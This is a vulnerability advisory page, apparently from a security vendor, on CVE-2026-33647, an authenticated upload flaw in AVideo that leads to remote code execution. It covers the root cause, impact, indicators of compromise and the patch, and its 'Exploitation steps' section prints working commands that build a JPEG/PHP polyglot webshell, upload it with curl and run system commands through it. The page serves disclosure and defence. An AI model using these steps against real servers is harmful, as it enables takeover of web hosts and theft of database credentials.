CVE-2026-33647: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33647 is a Remote Code Execution (RCE) vulnerability in WWBN AVideo caused by a MIME type/file extension mismatch in the ImageGallery::saveFile() method. It affects all versions of AVideo up to and including 26.0. The vulnerability was published on March 22–23, 2026, with a patch committed shortly after. It carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, AVideo Advisory).

Technical details

The root cause is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). In plugin/ImageGallery/ImageGallery.php, the saveFile() method validates uploaded file content using PHP's finfo MIME type detection (inspecting magic bytes), but derives the saved filename extension directly from the attacker-controlled $file['name'] field without any allowlist check. An attacker crafts a polyglot file beginning with valid JPEG magic bytes (\xff\xd8\xff\xe0) followed by PHP code, naming it with a .php extension. The MIME check passes (the file is identified as image/jpeg), but the file is saved as an executable .php file in the web-accessible videos/{videoFilename}/ImageGallery/ directory. The root .htaccess blocks extensions matching php[a-z0-9]+ but not plain .php, and no .htaccess exists in the upload target directory to disable PHP execution, leaving the uploaded webshell directly accessible and executable (AVideo Advisory).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary PHP code as the web server process (e.g., www-data). This enables reading sensitive configuration files such as videos/configuration.php (which contains database credentials), full database access, reading/modifying/deleting any file accessible to the web server, lateral movement within the server's network, and potential privilege escalation depending on server configuration. The upload response also returns the exact URL of the uploaded file, giving the attacker immediate access to their webshell (AVideo Advisory).

Exploitability

A detailed proof-of-concept exploit with step-by-step instructions, exact curl commands, and expected responses is publicly available in the GitHub security advisory (AVideo Advisory). Exploitation requires only a low-privilege authenticated account that owns at least one Image or Gallery type video, making the barrier to exploitation low on instances with open user registration. The EPSS score is approximately 0.39% (60th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (Github Advisory).

Exploitation steps

  1. Obtain credentials: Register or obtain a low-privilege AVideo user account that owns at least one Image or Gallery type video on the target instance (requires ImageGallery plugin to be enabled).
  2. Create a polyglot PHP/JPEG file: Craft a file that begins with valid JPEG magic bytes followed by a PHP webshell:
    printf '\xff\xd8\xff\xe0\x00\x10JFIF' > shell.php
    echo '<?php system($_GET["c"]); ?>' >> shell.php
  3. Verify MIME detection bypass: Confirm the file is detected as image/jpeg by finfo:
    file --mime-type shell.php
    # Expected: shell.php: image/jpeg
  4. Upload via the ImageGallery endpoint: Use a valid session cookie and the target video's ID to upload the polyglot file:
    curl -b 'PHPSESSID=<session_id>' \
      -F "upl=@shell.php;filename=shell.php" \
      'https://target/plugin/ImageGallery/upload.json.php?videos_id=<video_id>'
  5. Retrieve webshell URL: Parse the JSON response to obtain the exact URL of the uploaded .php file (e.g., https://target/videos/video_filename/ImageGallery/67890abcdef12.php).
  6. Execute arbitrary commands: Access the webshell via HTTP to run commands as the web server user:
    curl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'
    # Expected: uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (AVideo Advisory)

Indicators of compromise

  • Network: HTTP POST requests to /plugin/ImageGallery/upload.json.php with a multipart file upload where the filename ends in .php (or other executable extensions); subsequent GET requests to paths matching videos/*/ImageGallery/*.php with query parameters like ?c= or ?cmd=.
  • File System: Unexpected .php files in videos/{videoFilename}/ImageGallery/ directories; files in that directory beginning with JPEG magic bytes (\xff\xd8\xff\xe0) but containing PHP code.
  • Logs: Web server access logs showing POST requests to upload.json.php followed by GET requests to .php files under the videos/ path; PHP error logs showing execution of system commands from within the videos/ directory.
  • Process: Unusual child processes spawned by the web server process (e.g., www-data spawning sh, bash, curl, wget, or python) originating from the AVideo upload directory. (AVideo Advisory)

Mitigation and workarounds

Apply the patch in commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae, which refactors saveFile() to derive the saved file extension from the detected MIME type (via an allowlist map) rather than from the user-supplied filename, eliminating the extension mismatch (AVideo Patch). As a defense-in-depth workaround, add a .htaccess file to the videos/ directory to disable PHP execution (php_flag engine off) and restrict direct access. Additionally, implement strict server-level controls such as using Content-Disposition headers to force file downloads rather than execution in upload directories (AVideo Advisory).

Community reactions

The vulnerability was covered by The Hacker Wire, which published a technical write-up on the MIME type bypass in AVideo's file upload (The Hacker Wire). The advisory was noted on Bluesky and tracked by several CVE aggregation services shortly after publication. No major vendor statements beyond the GitHub advisory or significant broader media coverage have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management